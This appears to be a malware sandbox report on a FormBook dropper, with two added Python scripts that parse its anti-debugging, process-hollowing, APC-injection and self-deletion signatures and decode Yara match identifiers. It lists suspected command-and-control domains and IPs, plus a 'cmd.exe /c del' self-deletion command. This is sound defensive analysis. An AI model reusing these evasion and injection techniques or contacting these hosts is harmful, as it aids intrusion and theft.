Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03901C06 mov eax, dword ptr fs:[00000030h] 7_2_03901C06
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038C7016 mov eax, dword ptr fs:[00000030h] 7_2_038C7016
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391740D mov eax, dword ptr fs:[00000030h] 7_2_0391740D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387002D mov eax, dword ptr fs:[00000030h] 7_2_0387002D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387BC2C mov eax, dword ptr fs:[00000030h] 7_2_0387BC2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0385B02A mov eax, dword ptr fs:[00000030h] 7_2_0385B02A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0387A44B mov eax, dword ptr fs:[00000030h] 7_2_0387A44B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03860050 mov eax, dword ptr fs:[00000030h] 7_2_03860050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03860050 mov eax, dword ptr fs:[00000030h] 7_2_03860050
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h] 7_2_038DC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_038DC450 mov eax, dword ptr fs:[00000030h] 7_2_038DC450
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03902073 mov eax, dword ptr fs:[00000030h] 7_2_03902073
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_03911074 mov eax, dword ptr fs:[00000030h] 7_2_03911074
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386746D mov eax, dword ptr fs:[00000030h] 7_2_0386746D
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\DN_467842234567.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe Domain query: www.financecreditpro.com
Source: C:\Windows\explorer.exe Domain query: www.2377k.com
Source: C:\Windows\explorer.exe Domain query: www.portale-accessi-anomali.com
Source: C:\Windows\explorer.exe Network Connect: 5.9.90.226 80
Source: C:\Windows\explorer.exe Domain query: www.nurhalilah.xyz
Source: C:\Windows\explorer.exe Domain query: www.uscryptomininglaws.com
Source: C:\Windows\explorer.exe Domain query: www.healthcaresms.com
Source: C:\Windows\explorer.exe Network Connect: 104.21.11.163 80
Source: C:\Windows\explorer.exe Domain query: www.drive16pay.art
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.98 80
Source: C:\Windows\explorer.exe Domain query: www.smpldebts.com
Source: C:\Windows\explorer.exe Network Connect: 202.165.66.108 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\DN_467842234567.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DN_467842234567.exe Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\DN_467842234567.exe Memory written: C:\Users\user\Desktop\DN_467842234567.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\DN_467842234567.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\DN_467842234567.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 3424
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DN_467842234567.exe Process created: C:\Users\user\Desktop\DN_467842234567.exe 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: explorer.exe, 00000004.00000000.677442024.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.712289643.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 00000007.00000002.934906435.0000000006040000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040312A
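The signature lines in this part of the report are what an analyst actually works from: the fs:[30h] PEB reads and the DebugPort query under the anti-debugging signatures, and the explorer.exe DNS queries and connects, the WWAHost.exe hollowing, the APC queued into explorer.exe and the cmd.exe self-deletion under this evasion section. The following Python is an added example of turning such lines into a short triage summary; it is not part of the report or of any sandbox product. The sample lines are copied from this report (including the trailing "Jump to behavior" link text, which the code strips), the regular expressions are assumptions about the report's line layout rather than a documented format, and the rule that any image under C:\Windows counts as an OS process is a heuristic of mine.

```python
"""Triage of sandbox signature lines: PEB reads, DebugPort query, OS-process
network activity, hollowing, APC injection, dropper self-deletion.
Added example, not part of the report; sample lines copied from it, the
line patterns and the OS-process heuristic are assumptions."""
import re
from collections import Counter, defaultdict

REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0386F716 mov eax, dword ptr fs:[00000030h] 7_2_0386F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 7_2_0391070D mov eax, dword ptr fs:[00000030h] 7_2_0391070D
Source: C:\Users\user\Desktop\DN_467842234567.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe Network Connect: 5.9.90.226 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 10D0000 Jump to behavior
Source: C:\Users\user\Desktop\DN_467842234567.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DN_467842234567.exe' Jump to behavior
""".strip().splitlines()

# fs:[30h] is the PEB pointer in the 32-bit TEB: the usual prelude to checking
# PEB.BeingDebugged/NtGlobalFlag or walking the loader lists to resolve APIs.
PEB_RE = re.compile(r"^Source: (?P<proc>\S+) Code function: (?P<fn>\d+_\d+_[0-9A-F]+) "
                    r"mov e[a-z]{2}, dword ptr fs:\[00000030h\]")
DEBUG_RE = re.compile(r"^Source: (?P<proc>\S+) Process queried: DebugPort$")
DOMAIN_RE = re.compile(r"^Source: (?P<proc>\S+) Domain query: (?P<domain>\S+)$")
CONNECT_RE = re.compile(r"^Source: (?P<proc>\S+) Network Connect: (?P<ip>[\d.]+) (?P<port>\d+)$")
UNMAP_RE = re.compile(r"^Source: (?P<proc>\S+) Section unmapped: (?P<target>\S+) "
                      r"base address: (?P<base>[0-9A-Fa-f]+)$")
APC_RE = re.compile(r"^Source: (?P<proc>\S+) Thread APC queued: target process: (?P<target>\S+)$")
CREATED_RE = re.compile(r"^Source: (?P<proc>\S+) Process created: (?P<cmdline>.+)$")
SELF_DELETE_RE = re.compile(r"cmd\.exe /c del '(?P<path>[^']+)'", re.IGNORECASE)


def normalize(line):
    """Drop the report's 'Jump to behavior' link text so the patterns can anchor on $."""
    return re.sub(r"\s+Jump to behavior$", "", line.strip())


def is_os_process(path):
    """Heuristic for the 'system process connects to network' rule: any image
    under C:\\Windows is treated as OS-shipped, so its traffic implies injection."""
    return path.lower().startswith("c:\\windows\\")


def triage(lines):
    peb = defaultdict(Counter)  # process -> function id -> PEB reads in that function
    out = {"debug_port_checks": [], "domains": set(), "connects": set(),
           "os_process_net": set(), "hollowed": [], "apc_targets": [], "self_delete": []}
    for raw in lines:
        line = normalize(raw)
        if m := PEB_RE.match(line):
            peb[m["proc"]][m["fn"]] += 1
        elif m := DEBUG_RE.match(line):
            out["debug_port_checks"].append(m["proc"])
        elif (m := DOMAIN_RE.match(line)) or (m := CONNECT_RE.match(line)):
            if "domain" in m.groupdict():
                out["domains"].add(m["domain"])
            else:
                out["connects"].add(f"{m['ip']}:{m['port']}")
            if is_os_process(m["proc"]):
                out["os_process_net"].add(m["proc"])
        elif m := UNMAP_RE.match(line):
            out["hollowed"].append((m["proc"], m["target"], int(m["base"], 16)))
        elif m := APC_RE.match(line):
            out["apc_targets"].append((m["proc"], m["target"]))
        elif (m := CREATED_RE.match(line)) and (d := SELF_DELETE_RE.search(m["cmdline"])):
            out["self_delete"].append(d["path"])
    out["peb_reads"] = {p: dict(c) for p, c in peb.items()}
    for key in ("domains", "connects", "os_process_net"):
        out[key] = sorted(out[key])
    return out


def findings(s):
    """Collapse the parsed evidence into the analyst-facing statements that matter here."""
    notes = [f"{p}: {len(f)} distinct functions read the PEB via fs:[30h]" for p, f in s["peb_reads"].items()]
    if s["debug_port_checks"]:
        notes.append("DebugPort queried (NtQueryInformationProcess anti-debug)")
    notes += [f"process hollowing: {src} unmapped {tgt} at {base:#x}" for src, tgt, base in s["hollowed"]]
    notes += [f"APC injection: {src} -> {tgt}" for src, tgt in s["apc_targets"]]
    if s["os_process_net"]:
        notes.append("OS process with network activity (injected code): " + ", ".join(s["os_process_net"]))
    if s["domains"]:
        notes.append(f"{len(s['domains'])} candidate C2 domains, {len(s['connects'])} direct connects")
    notes += [f"dropper self-deletion: {p}" for p in s["self_delete"]]
    return notes


if __name__ == "__main__":
    for note in findings(triage(REPORT_LINES)):
        print(note)
```

Run against the sample, the three PEB-read lines collapse to two distinct functions (one read twice), the DNS queries and connects are attributed to explorer.exe, which has no reason to contact those hosts unless injected code is running in it, and the cmd.exe del line is surfaced as self-deletion of the dropper, which is why the original file is already gone when a responder looks for it on disk.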

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
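The "File source" identifiers in the two Yara sections above encode where in which process the FormBook code was found. The following Python is an added example that decodes them; it is not from the report or from the sandbox vendor. The field layout (process index, stage, dump sequence number, base address, protection, and a last field whose meaning the page does not state) is inferred from the identifiers themselves and from the N_M_ prefixes on the code-function lines, and the protection decode assumes the fifth field is a Win32 PAGE_* constant, which agrees with the report describing the 0x40 regions as "execute and read and write". The process-index map is read off this report's own prefixes.

```python
"""Decode the Yara 'File source' identifiers listed above. Added example, not
part of the report or of the sandbox vendor's tooling; the field layout is
inferred from the identifiers, not taken from documentation."""
import re

# Identifiers copied from this report.
YARA_SOURCES = [
    "1.2.DN_467842234567.exe.400000.0.raw.unpack",
    "0.2.DN_467842234567.exe.e920000.3.unpack",
    "1.1.DN_467842234567.exe.400000.0.unpack",
    "00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp",
    "00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp",
    "00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp",
    "00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp",
    "00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp",
]

# Process index -> image, read off the report's own prefixes: 0_2_/1_2_ code
# functions are in DN_467842234567.exe, 7_2_ in WWAHost.exe, and the memory
# strings tagged "explorer.exe, 00000004...." tie index 4 to explorer.exe.
PROCESS_INDEX = {0: "DN_467842234567.exe", 1: "DN_467842234567.exe",
                 4: "explorer.exe", 7: "WWAHost.exe"}

# Win32 memory protection constants (assumed to be what the fifth field holds).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MODIFIERS = ((0x100, "GUARD"), (0x200, "NOCACHE"), (0x400, "WRITECOMBINE"))

# <proc>.<stage>.<sequence>.<base>.<protection>.<last field>.sdmp
SDMP_RE = re.compile(r"^(?P<proc>\d{8})\.(?P<stage>\d{8})\.(?P<seq>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
                     r"\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<last>[0-9A-Fa-f]{8})\.sdmp$")
# <proc>.<stage>.<image name>.<base>.<index>[.raw].unpack  (the image name itself contains a dot)
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+)\.(?P<base>[0-9A-Fa-f]+)"
                       r"\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$")


def decode_protect(value):
    """Name a PAGE_* value; the low byte is the access type, higher bits are modifiers."""
    name = PAGE_PROTECT.get(value & 0xFF, f"unknown({value:#x})")
    return "|".join([name] + [n for bit, n in MODIFIERS if value & bit])


def parse_source(name):
    """Describe one identifier, or return None if it is neither of the two forms."""
    if m := SDMP_RE.match(name):
        protect = int(m["protect"], 16)
        return {"process": PROCESS_INDEX.get(int(m["proc"]), f"process index {int(m['proc'])}"),
                "stage": int(m["stage"]), "base": int(m["base"], 16),
                "protect": decode_protect(protect), "executable": (protect & 0xFF) in EXECUTABLE,
                "last_raw": m["last"], "source": "memory dump"}
    if m := UNPACK_RE.match(name):
        return {"process": m["image"], "stage": int(m["stage"]), "base": int(m["base"], 16),
                "protect": None, "executable": None,   # protection is not recorded in this form
                "last_raw": None, "source": "unpacked PE" + (" (raw)" if m["raw"] else "")}
    return None


def processes_with_executable_hits(names):
    """Processes in which matched FormBook code sat in executable memory: the
    evidence that the payload was injected and ran there, not merely written."""
    hits = {info["process"] for info in map(parse_source, names) if info and info["executable"]}
    return sorted(hits)


if __name__ == "__main__":
    for n in YARA_SOURCES:
        print(n, "->", parse_source(n))
    print("executable hits in:", processes_with_executable_hits(YARA_SOURCES))
```

The point for a responder is the set of processes that come back from processes_with_executable_hits: the 0x40 (PAGE_EXECUTE_READWRITE) regions at 0x560000 in WWAHost.exe and 0xF01F000 in explorer.exe hold injected, executable FormBook code, so a host-based hunt should look at writable-and-executable memory in those two processes rather than at the dropper, which deletes itself.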